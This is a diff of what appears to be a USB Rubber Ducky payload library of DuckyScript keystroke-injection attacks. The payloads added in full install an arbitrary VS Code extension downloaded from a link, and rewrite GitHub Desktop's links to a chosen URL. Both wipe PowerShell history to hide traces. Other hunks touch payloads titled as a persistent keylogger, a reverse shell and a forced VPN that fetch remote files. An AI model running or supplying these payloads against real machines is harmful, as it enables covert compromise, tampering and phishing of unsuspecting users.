- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install.
- Make sure that PowerShell is available on the target machine.
- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

88
payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt Normal file
View File

@ -0,0 +1,88 @@
REM_BLOCK
##########################################################
# #
# Title : Install Any Arbitrary VSCode Extension #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10 #
# #
##########################################################
END_REM
REM Replace "example" with the name of the extension folder
DEFINE #EXTENSION_NAME example
REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
if (Test-Path -Path $extensionsPath -PathType Container) {
Remove-Item -Recurse -Force -Path $extensionsPath
}
END_STRINGLN
REM May it depends by the extension...
DELAY 2000
STRINGLN_POWERSHELL
$url = "#ARCHIVE_LINK"
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
Invoke-WebRequest -Uri $url -OutFile $downloadPath
if (Test-Path -Path $downloadPath) {
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
Remove-Item -Path $downloadPath -Force
Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
}
END_STRINGLN

61
payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
View File

@ -1,12 +1,14 @@
REM ##################################################################
REM # |
REM # Title : Make Windows performant (but ugly and boring) |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ##################################################################
REM_BLOCK
##################################################################
# #
# Title : Make Windows performant (but ugly and boring) #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
##################################################################
END_REM
REM Plug-And-Play <3
@ -16,7 +18,48 @@ REM - Nothing
REM Note:
REM - Payload tested on Windows 11 Eng
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 2000

48
payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
View File

@ -1,12 +1,14 @@
REM ########################################################
REM # #
REM # Title : Persistent Keylogger - Telegram Based #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Persistent Keylogger - Telegram Based #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
########################################################
END_REM
REM Requirements:
REM - Internet Connection
@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000

48
payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
View File

@ -1,12 +1,14 @@
REM ############################################################
REM # #
REM # Title : Persistent Reverse Shell - Telegram Based #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ############################################################
REM_BLOCK
############################################################
# #
# Title : Persistent Reverse Shell - Telegram Based #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
############################################################
END_REM
REM Requirements:
REM - Internet Connection
@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000

69
payloads/library/execution/Replace_Links_In_GithubDesktop/README.md Normal file
View File

@ -0,0 +1,69 @@
# Replace Links In GithubDesktop
This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
## Table of Contents
- [Features](#features)
- [Prerequisites](#prerequisites)
- [Usage](#usage)
- [Credits](#credits)
## Features
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
1. Detects the installation folder of GitHub Desktop.
2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
## Prerequisites
- **Windows 10/11**
- **GitHub Desktop** installed on the machine.
## Usage
1. **Modify the script**:
- Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
```duckyscript
DEFINE #NEW_LINK example.com
```
2. **Customization**:
- Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
```ducky
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
```
3. **Execution**:
- Upon execution, the script will:
- Open PowerShell.
- Detect the GitHub Desktop installation directory.
- Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

109
payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt Normal file
View File

@ -0,0 +1,109 @@
REM_BLOCK
#####################################################
# #
# Title : Replace Links In GithubDesktop #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
REM REQUIRED - Define here the new url that will replace the original github link
DEFINE #NEW_LINK example.com
REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
$path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
$folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
$versions = $folders | ForEach-Object {
[PSCustomObject]@{
FolderName = $_.Name
Version = [version]($_.Name -replace "app-", "")
}
}
$latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
$latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
$latestFolderPath += "\resources\app\"
$renderer = "renderer.js"
$main = "main.js"
$filePath = "$latestFolderPath$renderer"
$fileContent = Get-Content $filePath
$regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
$modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
Set-Content -Path $filePath -Value $modifiedContent
$filePath = "$latestFolderPath$main"
$fileContent = Get-Content $filePath
$regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
$modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
END_STRINGLN

21
payloads/library/execution/SendEmailThroughThunderbird/payload.txt
View File

@ -1,13 +1,14 @@
REM ########################################################
REM # |
REM # Title : Send Email Through Thunderbird |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 - Linux(debian tested) |
REM # |
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Send Email Through Thunderbird #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 - Linux(debian tested) #
# #
########################################################
END_REM
REM Requirements:
REM - Internet Connection

64
payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
View File

@ -1,22 +1,64 @@
REM ############################################################
REM # |
REM # Title : Send Messages In Discord Channel-Server |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM ############################################################
REM_BLOCK
############################################################
# #
# Title : Send Messages In Discord Channel-Server #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11 #
# #
############################################################
END_REM
REM Requirements:
REM - Internet connection
REM - Discord Installed
REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky
DEFINE #CHAT_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Discord app
GUI

76
payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
View File

@ -1,13 +1,14 @@
REM ####################################
REM # |
REM # Title : Set Arbitrary VPN |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ####################################
REM_BLOCK
####################################
# #
# Title : Set Arbitrary VPN #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
####################################
END_REM
REM Requirements:
REM - Permissions
@ -15,44 +16,57 @@ REM - Internet Connection
REM - 'openvpn' installed
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
DEFINE #SUDO_PASS example
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
DEFINE VPN_FILE_LINK example.com
DEFINE #VPN_FILE_LINK example.com
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRING sudo su
ENTER
STRINGLN sudo su
DELAY 1000
STRING SUDO_PASS
ENTER
STRINGLN #SUDO_PASS
DELAY 1000
REM #### VPN SECTION ####
STRING curl
STRING VPN_FILE_LINK
STRING > vpn_configuration.ovpn
ENTER
STRINGLN curl #VPN_FILE_LINK > vpn_configuration.ovpn
REM It depends by the internet connection
DELAY 2000
STRING openvpn vpn_configuration.ovpn
STRINGLN openvpn vpn_configuration.ovpn
REM It depends by the computer power
DELAY 2000
REM #### REMOVE TRACES ####
STRING rm vpn_configuration.ovpn
ENTER
DELAY 500

14
payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
View File

@ -1,12 +1,12 @@
REM_BLOCK
################################################################
# |
# Title : Set An Arbitrary And Persistent Tor Circuit |
# Author : Aleff |
# Version : 1.0 |
# Category : Execution |
# Target : Windows 10/11; Linux; |
# |
# #
# Title : Set An Arbitrary And Persistent Tor Circuit #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11; Linux; #
# #
################################################################
Requirements:

65
payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
View File

@ -1,24 +1,65 @@
REM ########################################################
REM # |
REM # Title : Set An Arbitrary DNS (IPv4 version) |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 11 |
REM # |
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Set An Arbitrary DNS (IPv4 version) #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 11 #
# #
########################################################
END_REM
REM Requirements:
REM - Nothing
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
DEFINE DNS example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Settings
DELAY 1000
GUI
DELAY 1000
STRING settings

20
payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
View File

@ -1,12 +1,14 @@
REM ###################################
REM # |
REM # Title : Set Tor Bridge |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ###################################
REM_BLOCK
###################################
# #
# Title : Set Tor Bridge #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
###################################
END_REM
REM Requirements:
REM - Tor installed

64
payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
View File

@ -1,17 +1,61 @@
REM ####################################################################################
REM # |
REM # Title : Starting a PowerShell with administrator permissions in Windows |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM ####################################################################################
REM_BLOCK
####################################################################################
# #
# Title : Starting a PowerShell with administrator permissions in Windows #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11 #
# #
####################################################################################
END_REM
REM Requirements:
REM - Nothing
DELAY 1000
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI x
DELAY 500
STRING a

72
payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
View File

@ -1,28 +1,68 @@
REM #####################################################
REM # |
REM # Title : Stop A Single Process In Windows |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM #####################################################
REM_BLOCK
#####################################################
# #
# Title : Stop A Single Process In Windows #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
REM Requirements:
REM - Nothing
REM Write the name of the process that you want to stop
DEFINE PROCESS_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Task Manager
GUI
DELAY 1000
STRING Task Manager
ENTER
STRINGLN Task Manager
DELAY 1000
REM Goto search bar
@ -36,9 +76,7 @@ TAB
DELAY 500
REM Write the process name
STRING PROCESS_NAME
DELAY 500
ENTER
STRINGLN PROCESS_NAME
DELAY 500
TAB
DELAY 500

49
payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
View File

@ -1,12 +1,14 @@
REM #######################################################
REM # |
REM # Title : Telegram Persistent Connection Linux |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM #######################################################
REM_BLOCK
#######################################################
# #
# Title : Telegram Persistent Connection Linux #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
#######################################################
END_REM
REM Requirements:
REM - Internet Connection
@ -14,7 +16,34 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000

67
payloads/library/execution/UninstallSignal/payload.txt
View File

@ -1,12 +1,14 @@
REM #####################################
REM # |
REM # Title : Uninstall Signal |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################
REM_BLOCK
#####################################
# #
# Title : Uninstall Signal #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11 #
# #
#####################################
END_REM
REM Plug-And-Play <3
@ -14,11 +16,52 @@ REM Requirements:
REM - Signal App installed
REM - ExecutionPolicy Bypass
DELAY 2000
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRING powershell
ENTER
STRINGLN powershell
DELAY 2000
STRINGLN Stop-Process -Name "Signal"

8
payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
View File

@ -36,17 +36,11 @@ In addition to legal implications, **unauthorized removal of an application can
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
<br>Linkedin
</td>
</tr>
</table>

66
payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
View File

@ -1,12 +1,14 @@
REM ##############################################################################
REM # |
REM # Title : Uninstall A Specific App On Windows Through Control Panel |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ##############################################################################
REM_BLOCK
##############################################################################
# #
# Title : Uninstall A Specific App On Windows Through Control Panel #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
##############################################################################
END_REM
REM Requirements:
REM - The application you want to uninstall must be installed on the target (?obvious right? ^^)
@ -17,15 +19,55 @@ REM - Payload tested on Windows 11 Eng
